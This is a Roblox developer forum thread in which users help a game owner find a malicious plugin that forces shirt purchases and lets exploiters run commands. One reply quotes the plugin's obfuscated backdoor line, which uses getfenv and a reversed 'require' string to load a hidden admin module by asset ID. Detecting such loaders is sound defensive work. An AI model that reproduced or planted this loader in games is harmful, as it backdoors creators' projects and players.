Try deleting both of those things since it will get rid of all of their children including the scripts if there are any located in there.
I remember reading somewhere that the NonReplicatedCSGDictionaryService
is commonly used for malicious script injection but I’m not sure why it’s used for that, or how they get there without a) anyone having team create access or b) having any malicious plugins.
I would private message a Roblox admin about this and delete the 2 folders in the NonReplicatedCSGDictionaryService
since this post is just going around in circles.
I deleted them and nothing happened. I did message a roblox staff member. I’m hoping they respond
Also any recomended staff members i should message?
Is there a number i can call?
You’re just going to have to wait for them to get back to you. I wouldn’t recommend going after any other staff members. I don’t believe Roblox has a number to call in general.
is this happening for real i hate to break it to you it must have been something on your end because of Filtering enabled - basically changes on the client do not replicate so if the hacker where to do this on his computer it would only affect him or her. So it must either be a plugin, team create, a model or some other malicious entity in studio that exists.
I cannot give the best response right now, so I do apologize for that. I read everyone’s replies and it might be a plugin inserting the malware. What I would do to test that theory is create a new game and see if that appears on the other games too. If not, then it means that it does not have to do with any plugins. Contacting Roblox Staff was a good idea, and I hope they can resolve the problem.
this is the asset id of the shirt: 3750950779 and i cant find the asset id in any of the scripts in the game But ill try your idea
You know what guys. You are right. It must be in my end. Though i don’t know what plugins or whatever are doing it.
I tried joining another game of mine and the same thing happened so its a plugin.
Or… something.
I found it! The malicious plugin is this one:
https://www.roblox.com/library/3620029023/HD-Graphics-Fixed
I missed it earlier , I apologize for my mistake. This line is causing you issues:
getfenv()[string.reverse'eriuqer'](3610223581+2-1+1)
Uninstall this and then delete those items again.
Edit: Looking into it more, it looks like its requiring this: https://www.roblox.com/library/3610223583/Admin-Commands.
Thankyou. You are my absolute Hero! ALL OF YOU WIN AN AWARD: MANELINS FAVORITE
That seems to not be the only scam I think. The creator of that plugin has re-uploaded many famous plugins (might be the original owner of the plugins, but I hardly think so). Here are the plugins:
Avoid adding any of these. I will check the scripts once I get home.
I remember nI2p now, he makes bad plugins and such, if you see anything created by him ignore it and stay away from it because it can totally destroy or mess up your game!
Am I right the issue is solved? If yes, mark the right answer as the solution, then people won’t read everything to discover it’s fixed.
Kind Regards,
Jonas
There is a jump model that triggers a purchase after five minutes. You can also find the script by running a search for MarketplaceService.
Open a script in your game, that will open the script menu.
Then click on Find, Select Find All.
Search for MarketplaceService
That should show you every instance it is being used in your game.
You will probably find the malicious code near by.
You can also run the search for the ID of the item being sold.
This should find most of the malicious use cases you have described.
Yeah nl2p is the one that made the furry shirt too
So does anyone have any suggestions to slove the exploitation? any recomended places to look for anti exploit scripts? Somehow people are exploiting in the main game… making shreks appear everywhere, or makign the whole server a dance party… even banning me from my own game. and making it so if i try to ban them it erases what i say. I have no idea how it gets through FE
Well you can’t “Get through FE”. You either have some poorly setup remote events that can handle commands or even run certain code. My guess is you probably have some hidden admin script somewhere which is allowing people to run commands/code. I suggest removing all of your plugins and then using the explorer “filter” tool to search for “script”. Using the Ctrl + f hotkey when inside a script to search for phrases like "require"can often help too. If there is any script that you did not write and or don’t understand what is actually being ran then I’d recommend you delete it aswell. Feel free to PM me if you want me to take a look, if you aren’t comfy with that then just reply here and i can try to help you further.
Here’s the roundify I use since it has about 10k installs.
Anyways, have you removed your plugins that you don’t need yet?
Yeah I’ve noticed that Roundify has been getting copied many times. I’ve been trying to get them taken down. Also, any malicious plugins you find, please do report them.
(i’ll be updating that post soon as I’ve got some new features planned, and 10K sales is outdated, it’s up to almost 35K